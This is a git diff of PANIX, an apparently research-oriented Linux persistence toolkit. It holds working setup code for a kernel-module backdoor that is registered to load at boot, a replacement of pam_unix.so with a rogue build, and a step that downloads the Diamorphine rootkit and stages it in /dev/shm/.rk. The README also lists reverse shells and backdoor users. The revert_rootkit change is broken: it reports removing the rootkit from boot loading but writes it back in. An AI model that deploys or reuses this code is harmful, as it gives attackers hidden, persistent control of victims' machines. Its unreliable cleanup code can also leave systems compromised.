diff --git a/README.md b/README.md
index e38a66f..2cefc93 100644
--- a/README.md
+++ b/README.md
@@ -14,52 +14,52 @@ PANIX provides a versatile suite of features for simulating and researching Linu
| **Feature** | **Description** |**Root**|**User**|
|----------------------------------|-----------------------------------------------------------------------------------------|--------|--------|
-| **At Job Persistence** | Implements persistence by adding entries to system jobs. | ✔️ | ✔️ |
-| **Authorized Keys** | Adds a public key to the authorized_keys file for SSH access. | ✔️ | ✔️ |
-| **Backdoor User** | Creates a backdoor user with `UID=0` (root privileges). | ✔️ | ❌ |
-| **Backdoored /etc/passwd** | Directly adds a malicious user entry to `/etc/passwd`. | ✔️ | ❌ |
-| **Backdoored /etc/init.d** | Establishes persistence via SysVinit (`/etc/init.d`). | ✔️ | ❌ |
-| **Backdoored /etc/rc.local** | Establishes persistence via run control (`/etc/rc.local`). | ✔️ | ❌ |
-| **Bind Shell** | Runs a pre-compiled/LOLBin bind shell for remote access. | ✔️ | ✔️ |
-| **Capabilities Backdoor** | Adds specific capabilities to binaries to maintain persistence. | ✔️ | ❌ |
-| **Cron Job Persistence** | Sets up cron jobs to ensure persistence across reboots. | ✔️ | ✔️ |
-| **Create User** | Creates a new user account on the system. | ✔️ | ❌ |
-| **Diamorphine Rootkit** | Installs the Diamorphine Loadable Kernel Module Rootkit. | ✔️ | ❌ |
-| **Git Persistence** | Utilizes Git hooks or pagers to persist within Git repositories. | ✔️ | ✔️ |
-| **Generator Persistence** | Leverages systemd generators to create persistent services. | ✔️ | ❌ |
-| **Malicious Container** | Deploys a Docker container designed to host escape. | ✔️ | ✔️ |
-| **Malicious Package** | Installs a `DPKG/RPM` package to achieve persistence. | ✔️ | ❌ |
-| **LD_PRELOAD Backdoor** | Uses `LD_PRELOAD` to inject malicious libraries for persistence. | ✔️ | ❌ |
-| **LKM Backdoor** | Loads a Loadable Kernel Module to maintain persistence. | ✔️ | ❌ |
-| **MOTD Backdoor** | Alters Message of the Day (MOTD) to establish persistence. | ✔️ | ❌ |
-| **Package Manager** | Manipulates `APT/YUM/DNF` to establish persistence on usage. | ✔️ | ❌ |
-| **PAM Persistence** | Installs a PAM backdoor using a rogue module or pam_exec. | ✔️ | ❌ |
-| **Password Change** | Changes user passwords to secure backdoor accounts. | ✔️ | ❌ |
-| **Reverse Shell** | Establishes a reverse shell (supporting multiple LOLBins). | ✔️ | ✔️ |
-| **Shell Profile Persistence** | Modifies shell profiles to execute scripts upon user login. | ✔️ | ✔️ |
-| **SSH Key Persistence** | Manipulates SSH keys to maintain persistent access via SSH. | ✔️ | ✔️ |
-| **Sudoers Backdoor** | Alters the `/etc/sudoers` file to grant elevated privileges. | ✔️ | ❌ |
-| **SUID Backdoor** | Backdoors binaries by setting the SUID bit. | ✔️ | ❌ |
-| **System Binary Backdoor** | Wraps system binaries to include backdoor functionality. | ✔️ | ❌ |
-| **Systemd Service** | Creates systemd services that ensure persistence on reboot. | ✔️ | ✔️ |
-| **Udev Persistence** | Utilizes drivers to persist at the hardware interaction level. | ✔️ | ❌ |
-| **Web Shell Persistence** | Deploys web servers for remote access via web interfaces. | ✔️ | ✔️ |
-| **XDG Autostart Persistence** | Employs XDG autostart directories to persist upon user login. | ✔️ | ✔️ |
+| **At Job Persistence** | Implements persistence by adding entries to system jobs. | ✅ | ✅ |
+| **Authorized Keys** | Adds a public key to the authorized_keys file for SSH access. | ✅ | ✅ |
+| **Backdoor User** | Creates a backdoor user with `UID=0` (root privileges). | ✅ | ❌ |
+| **Backdoored /etc/passwd** | Directly adds a malicious user entry to `/etc/passwd`. | ✅ | ❌ |
+| **Backdoored /etc/init.d** | Establishes persistence via SysVinit (`/etc/init.d`). | ✅ | ❌ |
+| **Backdoored /etc/rc.local** | Establishes persistence via run control (`/etc/rc.local`). | ✅ | ❌ |
+| **Bind Shell** | Runs a pre-compiled/LOLBin bind shell for remote access. | ✅ | ✅ |
+| **Capabilities Backdoor** | Adds specific capabilities to binaries to maintain persistence. | ✅ | ❌ |
+| **Cron Job Persistence** | Sets up cron jobs to ensure persistence across reboots. | ✅ | ✅ |
+| **Create User** | Creates a new user account on the system. | ✅ | ❌ |
+| **Diamorphine Rootkit** | Installs the Diamorphine Loadable Kernel Module Rootkit. | ✅ | ❌ |
+| **Git Persistence** | Utilizes Git hooks or pagers to persist within Git repositories. | ✅ | ✅ |
+| **Generator Persistence** | Leverages systemd generators to create persistent services. | ✅ | ❌ |
+| **Malicious Container** | Deploys a Docker container designed to host escape. | ✅ | ✅ |
+| **Malicious Package** | Installs a `DPKG/RPM` package to achieve persistence. | ✅ | ❌ |
+| **LD_PRELOAD Backdoor** | Uses `LD_PRELOAD` to inject malicious libraries for persistence. | ✅ | ❌ |
+| **LKM Backdoor** | Loads a Loadable Kernel Module to maintain persistence. | ✅ | ❌ |
+| **MOTD Backdoor** | Alters Message of the Day (MOTD) to establish persistence. | ✅ | ❌ |
+| **Package Manager** | Manipulates `APT/YUM/DNF` to establish persistence on usage. | ✅ | ❌ |
+| **PAM Persistence** | Installs a PAM backdoor using a rogue module or pam_exec. | ✅ | ❌ |
+| **Password Change** | Changes user passwords to secure backdoor accounts. | ✅ | ❌ |
+| **Reverse Shell** | Establishes a reverse shell (supporting multiple LOLBins). | ✅ | ✅ |
+| **Shell Profile Persistence** | Modifies shell profiles to execute scripts upon user login. | ✅ | ✅ |
+| **SSH Key Persistence** | Manipulates SSH keys to maintain persistent access via SSH. | ✅ | ✅ |
+| **Sudoers Backdoor** | Alters the `/etc/sudoers` file to grant elevated privileges. | ✅ | ❌ |
+| **SUID Backdoor** | Backdoors binaries by setting the SUID bit. | ✅ | ❌ |
+| **System Binary Backdoor** | Wraps system binaries to include backdoor functionality. | ✅ | ❌ |
+| **Systemd Service** | Creates systemd services that ensure persistence on reboot. | ✅ | ✅ |
+| **Udev Persistence** | Utilizes drivers to persist at the hardware interaction level. | ✅ | ❌ |
+| **Web Shell Persistence** | Deploys web servers for remote access via web interfaces. | ✅ | ✅ |
+| **XDG Autostart Persistence** | Employs XDG autostart directories to persist upon user login. | ✅ | ✅ |
# Support
PANIX offers comprehensive support across various Linux distributions.
-| **Distribution** | **Support** | **Tested Version** |
-|------------------|---------|-------------------------------------------|
-| **Debian** | ✔️ | Debian 11 & 12 |
-| **Ubuntu** | ✔️ | Ubuntu 22.04 (Diamorphine unavailable) |
-| **RHEL** | ✔️ | RHEL 9 (MOTD unavailable) |
-| **CentOS** | ✔️ | CentOS Stream 9 & 7 (MOTD unavailable) |
-| **Fedora** | ✔️ | Not fully tested |
-| **Arch Linux** | ✔️ | Not fully tested |
-| **OpenSUSE** | ✔️ | Not fully tested |
+| **Distribution** | **Support** | **Tested Version** |
+|------------------|-----------|----------------------------------------|
+| **Debian** | ✅ | Debian 11 & 12 |
+| **Ubuntu** | ✅ | Ubuntu 22.04 (Diamorphine unavailable) |
+| **RHEL** | ✅ | RHEL 9 (MOTD unavailable) |
+| **CentOS** | ✅ | CentOS Stream 9 & 7 (MOTD unavailable) |
+| **Fedora** | ✅ | Not fully tested |
+| **Arch Linux** | ✅ | Not fully tested |
+| **OpenSUSE** | ✅ | Not fully tested |
Custom or outdated Linux distributions may have different configurations or lack specific features, causing mechanisms to fail on untested versions. If a default command fails, use the `--custom` flag available in most features to adjust paths and commands for your environment. If that doesn't resolve the issue, review and modify the script to suit your needs.
@@ -97,15 +97,15 @@ This streamlined structure promotes efficient development, testing, and deployme
# Getting Started
-Getting PANIX up-and-running is as simple as downloading the script from the [release page](https://github.com/Aegrah/PANIX/releases/tag/panix-v2.0.0) and executing it:
+Getting PANIX up-and-running is as simple as downloading the script from the [release page](https://github.com/Aegrah/PANIX/releases/tag/panix-v2.0.1) and executing it:
```
-curl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v2.0.0/panix.sh | bash
+curl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v2.0.1/panix.sh | bash
```
Or download it and execute it manually:
```
# Download through curl or wget
-curl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v2.0.0/panix.sh -o panix.sh
-wget https://github.com/Aegrah/PANIX/releases/download/panix-v2.0.0/panix.sh -O panix.sh
+curl -sL https://github.com/Aegrah/PANIX/releases/download/panix-v2.0.1/panix.sh -o panix.sh
+wget https://github.com/Aegrah/PANIX/releases/download/panix-v2.0.1/panix.sh -O panix.sh
# Grant execution permissions and execute the script.
chmod +x panix.sh
diff --git a/modules/revert/revert_lkm.sh b/modules/revert/revert_lkm.sh
index 3cefc63..81f980d 100644
--- a/modules/revert/revert_lkm.sh
+++ b/modules/revert/revert_lkm.sh
@@ -53,6 +53,12 @@ revert_lkm() {
echo "[-] Temporary directory '${lkm_compile_dir}' not found."
fi
+ # Remove panix from /etc/modules, /etc/modules-load.d/panix.conf and /usr/lib/modules-load.d/panix.conf
+ echo "[+] Removing panix from /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/..."
+ sed -i '/panix/d' /etc/modules
+ rm -f /etc/modules-load.d/panix.conf
+ rm -f /usr/lib/modules-load.d/panix.conf
+
# Update module dependencies
echo "[+] Updating module dependencies..."
depmod -a
diff --git a/modules/revert/revert_malicious_package.sh b/modules/revert/revert_malicious_package.sh
index 7d7dd08..1991dad 100644
--- a/modules/revert/revert_malicious_package.sh
+++ b/modules/revert/revert_malicious_package.sh
@@ -1,93 +1,100 @@
revert_malicious_package() {
- usage_revert_malicious_package() {
- echo "Usage: ./panix.sh --revert malicious-package"
- echo "Reverts any changes made by the setup_malicious_package module."
- }
+ usage_revert_malicious_package() {
+ echo "Usage: ./panix.sh --revert malicious-package"
+ echo "Reverts any changes made by the setup_malicious_package module."
+ }
- echo "[+] Reverting malicious package..."
+ echo "[+] Reverting malicious package..."
- if ! check_root; then
- echo "Error: This function can only be run as root."
- return 1
- fi
+ if ! check_root; then
+ echo "Error: This function can only be run as root."
+ return 1
+ fi
- local mechanism=""
- local PACKAGE_NAME="panix"
+ local mechanism=""
+ local PACKAGE_NAME="panix"
- # Detect if RPM or DPKG was used
- if command -v rpm &> /dev/null && rpm -qa | grep -q "^${PACKAGE_NAME}"; then
- mechanism="rpm"
- elif command -v dpkg &> /dev/null && dpkg -l | grep -q "^ii ${PACKAGE_NAME} "; then
- mechanism="dpkg"
- else
- echo "[-] Malicious package '${PACKAGE_NAME}' not found via RPM or DPKG. No action needed."
- fi
+ # Detect if RPM or DPKG was used
+ if command -v rpm &> /dev/null && rpm -qa | grep -q "^${PACKAGE_NAME}"; then
+ mechanism="rpm"
+ elif command -v dpkg &> /dev/null && dpkg -l | grep -q "^ii ${PACKAGE_NAME} "; then
+ mechanism="dpkg"
+ else
+ echo "[-] Malicious package '${PACKAGE_NAME}' not found via RPM or DPKG. No action needed."
+ fi
- if [[ "$mechanism" == "rpm" ]]; then
- echo "[+] Removing RPM package '${PACKAGE_NAME}'..."
- rpm -e --noscripts "${PACKAGE_NAME}"
- if [[ $? -eq 0 ]]; then
- echo "[+] RPM package '${PACKAGE_NAME}' removed successfully."
- else
- echo "[-] Failed to remove RPM package '${PACKAGE_NAME}'."
- fi
+ if [[ "$mechanism" == "rpm" ]]; then
+ echo "[+] Removing RPM package '${PACKAGE_NAME}'..."
+ rpm -e --noscripts "${PACKAGE_NAME}"
+ if [[ $? -eq 0 ]]; then
+ echo "[+] RPM package '${PACKAGE_NAME}' removed successfully."
+ else
+ echo "[-] Failed to remove RPM package '${PACKAGE_NAME}'."
+ fi
- # Remove the RPM file from /var/lib/rpm
- if [[ -f "/var/lib/rpm/${PACKAGE_NAME}.rpm" ]]; then
- echo "[+] Removing RPM file '/var/lib/rpm/${PACKAGE_NAME}.rpm'..."
- rm -f "/var/lib/rpm/${PACKAGE_NAME}.rpm"
- echo "[+] RPM file removed."
- else
- echo "[-] RPM file '/var/lib/rpm/${PACKAGE_NAME}.rpm' not found."
- fi
+ # Remove the RPM file from /var/lib/rpm
+ if [[ -f "/var/lib/rpm/${PACKAGE_NAME}.rpm" ]]; then
+ echo "[+] Removing RPM file '/var/lib/rpm/${PACKAGE_NAME}.rpm'..."
+ rm -f "/var/lib/rpm/${PACKAGE_NAME}.rpm"
+ echo "[+] RPM file removed."
+ else
+ echo "[-] RPM file '/var/lib/rpm/${PACKAGE_NAME}.rpm' not found."
+ fi
- elif [[ "$mechanism" == "dpkg" ]]; then
- echo "[+] Removing DPKG package '${PACKAGE_NAME}'..."
- dpkg --purge "${PACKAGE_NAME}"
- if [[ $? -eq 0 ]]; then
- echo "[+] DPKG package '${PACKAGE_NAME}' removed successfully."
- else
- echo "[-] Failed to remove DPKG package '${PACKAGE_NAME}'."
- fi
- fi
+ elif [[ "$mechanism" == "dpkg" ]]; then
+ echo "[+] Removing DPKG package '${PACKAGE_NAME}'..."
+ dpkg --purge "${PACKAGE_NAME}"
+ if [[ $? -eq 0 ]]; then
+ echo "[+] DPKG package '${PACKAGE_NAME}' removed successfully."
+ else
+ echo "[-] Failed to remove DPKG package '${PACKAGE_NAME}'."
+ fi
+ fi
- # Remove the cron job added by the setup function
- echo "[+] Removing cron job associated with '${PACKAGE_NAME}'..."
- # Create a temporary file to store the current crontab
- crontab -l > /tmp/current_cron$$ 2>/dev/null
- if [[ $? -ne 0 ]]; then
- echo "[-] No crontab for user $(whoami). No action needed."
- rm -f /tmp/current_cron$$
- else
- # Remove lines containing the malicious package commands
- grep -v ".*${PACKAGE_NAME}.*" /tmp/current_cron$$ > /tmp/new_cron$$
- # Install the new crontab
- crontab /tmp/new_cron$$
- echo "[+] Cron job removed."
- # Clean up temporary files
- rm -f /tmp/current_cron$$ /tmp/new_cron$$
- fi
+ # Remove the cron job added by the setup function
+ echo "[+] Removing cron job associated with '${PACKAGE_NAME}'..."
+ # Create a temporary file to store the current crontab
+ crontab -l > /tmp/current_cron$$ 2>/dev/null
+ if [[ $? -ne 0 ]]; then
+ echo "[-] No crontab for user $(whoami). No action needed."
+ rm -f /tmp/current_cron$$
+ else
+ # Remove lines containing the malicious package commands
+ grep -v ".*${PACKAGE_NAME}.*" /tmp/current_cron$$ > /tmp/new_cron$$
+ # Install the new crontab
+ crontab /tmp/new_cron$$
+ echo "[+] Cron job removed."
+ # Clean up temporary files
+ rm -f /tmp/current_cron$$ /tmp/new_cron$$
+ fi
- # Clean up any remaining build directories (RPM)
- if [[ -d "~/rpmbuild" ]]; then
- echo "[+] Removing RPM build directory '~/rpmbuild'..."
- rm -rf ~/rpmbuild
- echo "[+] RPM build directory removed."
- fi
+ # Clean up any remaining build directories (RPM)
+ if [[ -d "~/rpmbuild" ]]; then
+ echo "[+] Removing RPM build directory '~/rpmbuild'..."
+ rm -rf ~/rpmbuild
+ echo "[+] RPM build directory removed."
+ fi
- # Clean up any remaining package directories (DPKG)
- if [[ -d "${PACKAGE_NAME}" ]]; then
- echo "[+] Removing package directory '${PACKAGE_NAME}'..."
- rm -rf "${PACKAGE_NAME}"
- echo "[+] Package directory removed."
- fi
+ # Clean up any remaining package directories (DPKG)
+ if [[ -d "${PACKAGE_NAME}" ]]; then
+ echo "[+] Removing package directory '${PACKAGE_NAME}'..."
+ rm -rf "${PACKAGE_NAME}"
+ echo "[+] Package directory removed."
+ fi
- # Remove any lingering files in /var/lib/dpkg/info (DPKG)
- if [[ -d "/var/lib/dpkg/info" ]]; then
- echo "[+] Cleaning up '/var/lib/dpkg/info'..."
- rm -f "/var/lib/dpkg/info/${PACKAGE_NAME}."*
- echo "[+] Cleanup completed."
- fi
+ # Remove any lingering files in /var/lib/dpkg/info (DPKG)
+ if [[ -d "/var/lib/dpkg/info" ]]; then
+ echo "[+] Cleaning up '/var/lib/dpkg/info'..."
+ rm -f "/var/lib/dpkg/info/${PACKAGE_NAME}."*
+ echo "[+] Cleanup completed."
+ fi
- return 0
+ # Remove any package files left in the home directory
+ if [[ -f "~/${PACKAGE_NAME}.deb" || -f "~/${PACKAGE_NAME}.rpm" ]]; then
+ echo "[+] Removing package files '~/${PACKAGE_NAME}.deb' and/or '~/${PACKAGE_NAME}.rpm'..."
+ rm -f ~/${PACKAGE_NAME}.deb ~/${PACKAGE_NAME}.rpm
+ echo "[+] Package files removed."
+ fi
+
+ return 0
}
diff --git a/modules/revert/revert_pam.sh b/modules/revert/revert_pam.sh
index 1716ae6..70e9860 100644
--- a/modules/revert/revert_pam.sh
+++ b/modules/revert/revert_pam.sh
@@ -9,52 +9,29 @@ revert_pam() {
return 1
fi
- # Function to restore the original pam_unix.so module
- restore_pam_module() {
- echo "[+] Restoring original PAM module..."
-
- # Detect the Linux distribution and package manager
- if [ -f /etc/os-release ]; then
- . /etc/os-release
- linux_distro=${ID_LIKE:-$ID}
- else
- linux_distro=$(uname -s | tr '[:upper:]' '[:lower:]')
- fi
-
- case "$linux_distro" in
- *ubuntu*|*debian*|*mint*|*kali*)
- echo "[+] Detected Debian-based distribution."
- echo "[+] Reinstalling 'libpam-modules' package..."
- apt-get update >/dev/null 2>&1
- apt-get install --reinstall -y libpam-modules >/dev/null 2>&1
+ remove_rogue_pam() {
+ echo "[+] Searching for rogue PAM module"
+ # Check for the presence of the malicious PAM module
+ pam_module_paths=(
+ "/lib/security/pam_unix.so"
+ "/usr/lib/security/pam_unix.so"
+ "/usr/lib64/security/pam_unix.so"
+ "/lib/x86_64-linux-gnu/security/pam_unix.so"
+ "/usr/lib/x86_64-linux-gnu/security/pam_unix.so"
+ "/lib64/security/pam_unix.so"
+ )
+
+ # Revert pam_unix.so with the pam_unix.so.bak backup
+ for pam_module in "${pam_module_paths[@]}"; do
+ if [[ -f "$pam_module.bak" ]]; then
+ mv -f "$pam_module.bak" "$pam_module"
if [[ $? -eq 0 ]]; then
- echo "[+] 'libpam-modules' reinstalled successfully."
+ echo "[+] Restored original PAM module '$pam_module'."
else
- echo "[-] Failed to reinstall 'libpam-modules'."
+ echo "[-] Failed to restore original PAM module '$pam_module'."
fi
- ;;
- *rhel*|*centos*|*fedora*)
- echo "[+] Detected RPM-based distribution."
- echo "[+] Reinstalling 'pam' package..."
- if command -v yum &>/dev/null; then
- yum reinstall -y pam >/dev/null 2>&1
- elif command -v dnf &>/dev/null; then
- dnf reinstall -y pam >/dev/null 2>&1
- else
- echo "[-] Neither 'yum' nor 'dnf' package manager found."
- return 1
- fi
- if [[ $? -eq 0 ]]; then
- echo "[+] 'pam' reinstalled successfully."
- else
- echo "[-] Failed to reinstall 'pam'."
- fi
- ;;
- *)
- echo "[-] Unsupported distribution: $linux_distro"
- return 1
- ;;
- esac
+ fi
+ done
}
# Function to remove malicious PAM_EXEC configurations and scripts
@@ -135,32 +112,8 @@ revert_pam() {
fi
}
- # Check for the presence of the malicious PAM module
- is_pam_module_replaced=false
- pam_module_paths=(
- "/lib/security/pam_unix.so"
- "/usr/lib64/security/pam_unix.so"
- "/lib/x86_64-linux-gnu/security/pam_unix.so"
- "/lib64/security/pam_unix.so"
- )
- for pam_module in "${pam_module_paths[@]}"; do
- if [[ -f "$pam_module" ]]; then
- # Check if the pam_unix.so has been modified
- if strings "$pam_module" | grep -q "PANIX"; then
- is_pam_module_replaced=true
- break
- fi
- fi
- done
-
- if [[ "$is_pam_module_replaced" = true ]]; then
- echo "[+] Malicious PAM module detected."
- restore_pam_module
- else
- echo "[-] No malicious PAM module detected."
- fi
-
# Remove PAM_EXEC backdoor and logging
+ remove_rogue_pam
remove_pam_exec_backdoor
remove_pam_exec_logging
diff --git a/modules/revert/revert_rootkit.sh b/modules/revert/revert_rootkit.sh
index 0e27437..5ae4309 100644
--- a/modules/revert/revert_rootkit.sh
+++ b/modules/revert/revert_rootkit.sh
@@ -100,6 +100,24 @@ revert_rootkit() {
done
fi
+ # Remove the module from /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/
+ echo "[+] Removing rootkit module from /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/..."
+ if [ -d "/etc/modules-load.d" ]; then
+ echo "${rk_name}" > /etc/modules-load.d/${rk_name}.conf
+ fi
+
+ if [ -d "/usr/lib/modules-load.d" ]; then
+ echo "${rk_name}" > /usr/lib/modules-load.d/${rk_name}.conf
+ fi
+
+ if [ -f "/etc/modules" ]; then
+ if grep -q "^${rk_name}$" /etc/modules; then
+ sed -i "/^${rk_name}$/d" /etc/modules
+ fi
+ fi
+
+ echo "[+] Rootkit module removed from /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/"
+
# Step 4: Remove /dev/shm/.rk directory
remove_directory "$rk_path"
diff --git a/modules/setup_lkm.sh b/modules/setup_lkm.sh
index 0a790c8..3075631 100644
--- a/modules/setup_lkm.sh
+++ b/modules/setup_lkm.sh
@@ -130,10 +130,10 @@ setup_lkm_backdoor() {
# Ensure proper escaping for C string
command="\"/bin/bash\",\"-c\",\"$command\",NULL"
lkm_destination="$lkm_path"
- mkdir -p $(dirname $lkm_destination)
+ mkdir -p $(dirname $lkm_destination)
fi
- mkdir -p ${lkm_compile_dir}
+ mkdir -p ${lkm_compile_dir}
cat <<-EOF > ${lkm_source}
#include <linux/module.h>
@@ -176,12 +176,12 @@ setup_lkm_backdoor() {
MODULE_DESCRIPTION("LKM Backdoor");
EOF
- # Check if the source file was created
- if [ ! -f "$lkm_source" ]; then
- echo "Failed to create the kernel module source code at $lkm_source"
- exit 1
- else
- echo "Kernel module source code created: $lkm_source"
+ # Check if the source file was created
+ if [ ! -f "$lkm_source" ]; then
+ echo "[-] Failed to create the kernel module source code at $lkm_source"
+ exit 1
+ else
+ echo "[+] Kernel module source code created: $lkm_source"
fi
# Create the Makefile
@@ -196,11 +196,11 @@ clean:
make -C /lib/modules/\$(shell uname -r)/build M=\$(PWD) clean
EOF
- if [ ! -f "${lkm_compile_dir}/Makefile" ]; then
- echo "Failed to create the Makefile at ${lkm_compile_dir}/Makefile"
+ if [ ! -f "${lkm_compile_dir}/Makefile" ]; then
+ echo "[-] Failed to create the Makefile at ${lkm_compile_dir}/Makefile"
exit 1
- else
- echo "Makefile created: ${lkm_compile_dir}/Makefile"
+ else
+ echo "[+] Makefile created: ${lkm_compile_dir}/Makefile"
fi
# Compile the kernel module using make
@@ -208,7 +208,7 @@ EOF
make
if [ $? -ne 0 ]; then
- echo "Compilation failed. Exiting."
+ echo "[-] Compilation failed. Exiting."
exit 1
fi
@@ -216,18 +216,35 @@ EOF
cp ${lkm_compile_dir}/${lkm_name}.ko ${lkm_destination}
if [ $? -ne 0 ]; then
- echo "Copying module failed. Exiting."
+ echo "[-] Copying module failed. Exiting."
exit 1
fi
- echo "Kernel module compiled successfully: ${lkm_destination}"
+ echo "[+] Kernel module compiled successfully: ${lkm_destination}"
sudo insmod ${lkm_destination}
if [[ $? -ne 0 ]]; then
- echo "Failed to load the kernel module. Check dmesg for errors."
+ echo "[-] Failed to load the kernel module. Check dmesg for errors."
exit 1
fi
- echo "Kernel module loaded successfully. Check dmesg for the output."
+ # Add kernel module to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/
+ echo "[+] Adding kernel module to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/..."
+ if [ -d "/etc/modules-load.d" ]; then
+ echo "${lkm_name}" > /etc/modules-load.d/${lkm_name}.conf
+ fi
+
+ if [ -d "/usr/lib/modules-load.d" ]; then
+ echo "${lkm_name}" > /usr/lib/modules-load.d/${lkm_name}.conf
+ fi
+
+ if [ -f "/etc/modules" ]; then
+ if ! grep -q "^${lkm_name}$" /etc/modules; then
+ echo "${lkm_name}" >> /etc/modules
+ fi
+ fi
+
+ echo "[+] Kernel module loaded successfully. Check dmesg for the output."
+ echo "[+] Kernel module added to /etc/modules, /etc/modules-load.d/ and /usr/lib/modules-load.d/"
echo "[+] LKM backdoor established!"
}
diff --git a/modules/setup_pam.sh b/modules/setup_pam.sh
index ce5c1f5..94b549d 100644
--- a/modules/setup_pam.sh
+++ b/modules/setup_pam.sh
@@ -215,9 +215,11 @@ setup_pam_persistence() {
local dest_dir=""
local possible_dirs=(
"/lib/security"
- "/usr/lib64/security"
- "/lib/x86_64-linux-gnu/security"
"/lib64/security"
+ "/lib/x86_64-linux-gnu/security"
+ "/usr/lib/security"
+ "/usr/lib64/security"
+ "/usr/lib/x86_64-linux-gnu/security"
)
for dir in "${possible_dirs[@]}"; do
@@ -232,6 +234,9 @@ setup_pam_persistence() {
exit 1
fi
+ echo "[+] Backing up original PAM library..."
+ mv -f "$dest_dir/pam_unix.so" "$dest_dir/pam_unix.so.bak"
+
echo "[+] Copying PAM library to $dest_dir..."
mv -f modules/pam_unix/.libs/pam_unix.so "$dest_dir"
diff --git a/modules/setup_rootkit.sh b/modules/setup_rootkit.sh
index 91fa759..0c71ffc 100644
--- a/modules/setup_rootkit.sh
+++ b/modules/setup_rootkit.sh
@@ -1,23 +1,23 @@
setup_rootkit() {
- # References:
- # Diamorphine Rootkit: https://github.com/m0nad/Diamorphine
- # Inspiration: https://github.com/MatheuZSecurity/D3m0n1z3dShell/blob/main/scripts/implant_rootkit.sh
- # Inspiration: https://github.com/Trevohack/DynastyPersist/blob/main/src/dynasty.sh#L194
-
- local rk_path="/dev/shm/.rk"
- local tmp_path="/tmp"
- local zip_url="https://github.com/Aegrah/Diamorphine/releases/download/v1.0.0/diamorphine.zip"
- local tar_url="https://github.com/Aegrah/Diamorphine/releases/download/v1.0.0/diamorphine.tar"
- local clone_url="https://github.com/Aegrah/Diamorphine.git"
- local secret=""
- local identifier=""
+ # References:
+ # Diamorphine Rootkit: https://github.com/m0nad/Diamorphine
+ # Inspiration: https://github.com/MatheuZSecurity/D3m0n1z3dShell/blob/main/scripts/implant_rootkit.sh
+ # Inspiration: https://github.com/Trevohack/DynastyPersist/blob/main/src/dynasty.sh#L194
+
+ local rk_path="/dev/shm/.rk"
+ local tmp_path="/tmp"
+ local zip_url="https://github.com/Aegrah/Diamorphine/releases/download/v1.0.0/diamorphine.zip"
+ local tar_url="https://github.com/Aegrah/Diamorphine/releases/download/v1.0.0/diamorphine.tar"
+ local clone_url="https://github.com/Aegrah/Diamorphine.git"
+ local secret=""
+ local identifier=""
if ! check_root; then
echo "Error: This function can only be run as root."
exit 1
fi
- usage_rootkit() {
+ usage_rootkit() {
echo "Usage: ./panix.sh --rootkit"
echo "--examples Display command examples"
echo "--secret <secret> Specify the secret"
@@ -82,57 +82,57 @@ setup_rootkit() {
exit 1
fi
- echo "[!] There are known issues with the Diamorphine rootkit for Ubuntu 22.04."
- echo "[!] This module is tested on Debian 11, 12, RHEL 9, CentOS Stream 9 and CentOS 7."
- echo "[!] I cannot guarantee that it will work on other distributions."
- sleep 5
-
- mkdir -p $rk_path
-
- # Check if wget or curl is installed
- if command -v wget >/dev/null 2>&1; then
- downloader="wget"
- elif command -v curl >/dev/null 2>&1; then
- downloader="curl"
- else
- echo "Error: Neither 'wget' nor 'curl' is installed. Please install one of them to proceed."
- exit 1
- fi
-
- # Function to download files using the available downloader
- download_file() {
- local url="$1"
- local output="$2"
- if [ "$downloader" = "wget" ]; then
- wget -O "$output" "$url"
- else
- curl -L -o "$output" "$url"
- fi
- }
-
- # Check for zip/unzip
- if command -v zip >/dev/null 2>&1 && command -v unzip >/dev/null 2>&1; then
- echo "zip/unzip is available. Downloading diamorphine.zip..."
- download_file "${zip_url}" "${tmp_path}/diamorphine.zip"
- unzip "${tmp_path}/diamorphine.zip" -d "${tmp_path}/diamorphine"
+ echo "[!] There are known issues with the Diamorphine rootkit for Ubuntu 22.04."
+ echo "[!] This module is tested on Debian 11, 12, RHEL 9, CentOS Stream 9 and CentOS 7."
+ echo "[!] I cannot guarantee that it will work on other distributions."
+ sleep 5
+
+ mkdir -p $rk_path
+
+ # Check if wget or curl is installed
+ if command -v wget >/dev/null 2>&1; then
+ downloader="wget"
+ elif command -v curl >/dev/null 2>&1; then
+ downloader="curl"
+ else
+ echo "Error: Neither 'wget' nor 'curl' is installed. Please install one of them to proceed."
+ exit 1
+ fi
+
+ # Function to download files using the available downloader
+ download_file() {
+ local url="$1"
+ local output="$2"
+ if [ "$downloader" = "wget" ]; then
+ wget -O "$output" "$url"
+ else
+ curl -L -o "$output" "$url"
+ fi
+ }
+
+ # Check for zip/unzip
+ if command -v zip >/dev/null 2>&1 && command -v unzip >/dev/null 2>&1; then
+ echo "zip/unzip is available. Downloading diamorphine.zip..."
+ download_file "${zip_url}" "${tmp_path}/diamorphine.zip"
+ unzip "${tmp_path}/diamorphine.zip" -d "${tmp_path}/diamorphine"
mv ${tmp_path}/diamorphine/Diamorphine-master/* "${rk_path}/"
- # Check for tar
- elif command -v tar >/dev/null 2>&1; then
- echo "tar is available. Downloading diamorphine.tar..."
- download_file "${tar_url}" "${tmp_path}/diamorphine.tar"
- tar -xf "${tmp_path}/diamorphine.tar" -C "${rk_path}/" --strip-components=1
+ # Check for tar
+ elif command -v tar >/dev/null 2>&1; then
+ echo "tar is available. Downloading diamorphine.tar..."
+ download_file "${tar_url}" "${tmp_path}/diamorphine.tar"
+ tar -xf "${tmp_path}/diamorphine.tar" -C "${rk_path}/" --strip-components=1
- # Check for git
- elif command -v git >/dev/null 2>&1; then
- echo "git is available. Cloning diamorphine.git..."
- git clone "${clone_url}" "${tmp_path}/diamorphine"
+ # Check for git
+ elif command -v git >/dev/null 2>&1; then
+ echo "git is available. Cloning diamorphine.git..."
+ git clone "${clone_url}" "${tmp_path}/diamorphine"
mv ${tmp_path}/diamorphine/* "${rk_path}/"
- # If none are available
- else
- echo "Error: None of unzip, tar, or git is installed. Please install one of them to proceed, or download Diamorphine manually."
- exit 1
- fi
+ # If none are available
+ else
+ echo "Error: None of unzip, tar, or git is installed. Please install one of them to proceed, or download Diamorphine manually."
+ exit 1
+ fi
# Obfuscate most obvious strings
# Files
@@ -186,15 +186,32 @@ setup_rootkit() {
fi
make -C ${rk_path} clean
